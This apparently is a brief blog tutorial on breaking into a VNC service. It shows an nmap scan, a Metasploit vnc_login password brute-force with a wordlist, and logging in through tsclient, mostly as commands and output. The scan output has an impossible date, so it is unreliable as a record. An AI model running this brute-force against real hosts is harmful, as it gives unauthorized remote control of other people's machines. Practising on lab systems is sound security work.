control – metasploit vnc scanner

Backtrack 5R1

1. Scan for open vnc service using nmap

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

2. Using metasploit to try and bruteforce the password with default blank username

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt

(option to use a word list for username msf  auxiliary(vnc_login) > set   USERPASS_FILE  /opt/metasploit-4.1.4/msf3/data/wordlists/VNC_default_user.txt)
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run

[*] IP-Address:5900 – Starting VNC login sweep
[*] IP-Address:5900 VNC – [01/18] – Attempting VNC login with password ”
[*] IP-Address:5900 VNC – [01/18] – , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC – [01/18] – , Authentication failed
[*] IP-Address:5900 VNC – [02/18] – Attempting VNC login with password ‘password’
[*] IP-Address:5900 VNC – [02/18] – , VNC server protocol version : 3.3

[+] IP-Address:5900, VNC server password : “password”

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2. Open Terminal Server Client

root@bt:~# tsclient

Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect

3. A Password box will open type in password press enter.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s